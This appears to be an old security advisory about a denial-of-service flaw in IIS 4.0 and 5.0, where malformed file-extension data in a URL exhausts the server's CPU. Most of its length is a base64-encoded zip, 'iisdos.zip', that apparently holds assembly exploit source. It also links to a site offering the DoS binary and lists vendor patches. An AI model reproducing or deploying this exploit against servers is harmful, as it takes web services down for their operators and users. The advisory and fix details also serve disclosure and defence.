COMMAND
Internet Information Server
SYSTEMS AFFECTED
Microsoft Internet Information Server 4.0, 5.0
PROBLEM
The Ussr Labs team has discovered a memory problem in IIS 4.0 and
5.0. What happens is by preforming an attack with
specially-malformed information extension data in The URL, it will
cause slow the performance of an affected server, or temporarily
stop it altogether.
Binary or Source for this D.o.S:
http://www.ussrback.com/
In compliance with RFC 2396, the algorithm in IIS that processes
URLs has flexibility built in to allow it to process any
arbitrary sequence of file extensions or subresource identifiers
(referred to in the RFC as path_segments). By providing an URL
that contains specially-malformed file extension information, a
malicious user could misuse this flexibility in order to
arbitrarily increase the work factor associated with parsing the
URL. This could consume much or all of the CPU availability on
the server and prevent useful work from being done.
Mimed exploit source:
---
Content-Type: application/octet-stream; name="iisdos.zip"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="iisdos.zip"
Content-MD5: Ok496UmHY/PxITWxrEJ4LA==
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
AAA=
-----
SOLUTION
Fix:
IIS 4.0: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20906
IIS 5.0: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20904